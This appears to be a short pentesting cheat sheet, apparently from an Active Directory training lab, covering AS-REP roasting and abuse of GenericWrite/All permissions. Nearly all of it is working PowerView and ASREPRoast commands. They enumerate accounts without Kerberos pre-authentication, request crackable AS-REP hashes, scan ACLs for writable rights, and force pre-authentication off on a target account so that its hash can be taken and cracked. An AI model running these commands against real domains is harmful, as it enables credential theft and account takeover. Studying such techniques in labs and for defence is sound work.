AD Pre Auth, AS-REP, GennericWrite/All

Enum Users With Kerberos Pre Auth Disabled

. .\PowerView_dev.ps1

Get-DomainUser -PreauthNotRequired

Request Hash

. C:\AD\Tools\ASREPRoast-master\ASREPRoast-master\ASREPRoast.ps1

Get-ASREPHash -UserName VPN648user

Enum Users Who Has GenericWrite/All Right

. .\PowerView_dev.ps1

Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}

Force Set Preauth Not Required

Set-DomainObject -Identity Control648User -XOR @{useraccountcontrol=4194304} -Verbose

Get-DomainUser -PreauthNotRequired -Identity Control648User

Request Ticket

Get-ASREPHash -UserName Control648User -Verbose

We can crack this ticket too.

Abusing Active Directory ACLs/ACEs

AS-REP Roasting

Abusing Active Directory ACLs/ACEs